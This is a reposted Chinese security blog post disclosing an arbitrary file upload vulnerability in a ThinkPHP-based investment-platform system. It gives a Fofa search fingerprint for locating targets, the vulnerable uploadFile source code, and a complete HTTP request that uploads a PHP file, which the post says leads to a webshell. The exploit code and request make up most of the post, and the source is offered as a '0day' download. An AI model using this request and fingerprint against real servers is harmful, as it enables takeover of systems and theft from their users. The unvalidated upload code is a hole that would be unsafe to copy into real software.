文章总结: 文档披露Fidelity充电桩AI量化理财系统存在前台任意文件上传漏洞。该系统基于ThinkPHP框架,其uploadFile接口未对上传文件进行校验,且仅需前台用户登录权限。攻击者可利用此漏洞上传Webshell获取服务器控制权。建议用户限制上传目录权限或修补代码,过滤文件类型。 综合评分: 89 文章分类: 代码审计,漏洞分析,渗透测试,漏洞POC,WEB安全
Fidelity充电桩AI量化理财系统存在前台任意文件上传漏洞
原创
Mstir
星悦安全
2026年1月14日 10:14 浙江
点击上方蓝字关注我们 并设为星标
0x00 前言
Fidelity充电桩AI量化投资理财系统,全开源的一套投资理财系统,可以改成任意产品,里面有点混乱,有民宿的产品、虚拟货币的产品、充电桩、AI量化产品,反正有点乱,有签到、积分商城、团队推广
Fofa指纹:”模块不存在:index” && “/assets/img/error.svg” (模糊匹配,无明显指纹,需自行寻找)
框架:ThinkPHP 5.0.24 Debug:True
0x01 漏洞研究&复现
需前台用户登录权限,若有邀请码可直接注册,或尝试使用默认账户登录.
位于 /application/api/controller/Index.php 的 uploadFile 方法,通过file 上传文件,且无过滤,导致漏洞产生
public function uploadFile(){
$token=$this->request->post('token');
$_user=Token::get($token);
$userModel=new \app\admin\model\User();
$user = $userModel->where(['id'=>$_user['user_id']])->find();
if ($user) {
$file = request()->file('file');
$info = $file->move(ROOT_PATH . 'public' . DS . 'uploadss');
if($info){
$update_date = [];
$update_date['avatar'] = '/uploadss/'.$info->getSaveName();
$userModel->where(['id'=>$user['id']])->update($update_date);
// return $this->return_msg("OK", $result['data'], 0, 200);
$this->success('ok',$update_date['avatar']);
}else{
// 上传失败获取错误信息
$this->error('上传失败!');
}
} else {
$this->error('正在加载',[],-1);
}
}
首先注册或登录获取一个token
然后直接发包上传即可,记得要填入你获取到的Token Payload:
POST /api/index/uploadFile HTTP/1.1
Host: 192.168.140.128
Content-Length: 325
Cache-Control: max-age=0
Origin: http://192.168.140.128
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymwG6xOs2kBR9BArt
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.140.128/api/index/uploadFile
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cookie: PHPSESSID=u4bthq23tf9mrsrn4bti7he5k7; f8bdb5149c9ad194cc3bf011b9ab4f61_ssl=2f054995-5901-4d4f-8a53-ce4d9fcec439.JcV5WvejEScTH4k3es7hKgZ7TNk
Connection: close
------WebKitFormBoundarymwG6xOs2kBR9BArt
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundarymwG6xOs2kBR9BArt
Content-Disposition: form-data; name="token"
你的Token
------WebKitFormBoundarymwG6xOs2kBR9BArt--
0x02 源码下载
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,交易所
关注下方公众号,发送 260114 获取源码!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!****
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星悦安全 Mstir《Fidelity充电桩AI量化理财系统存在前台任意文件上传漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论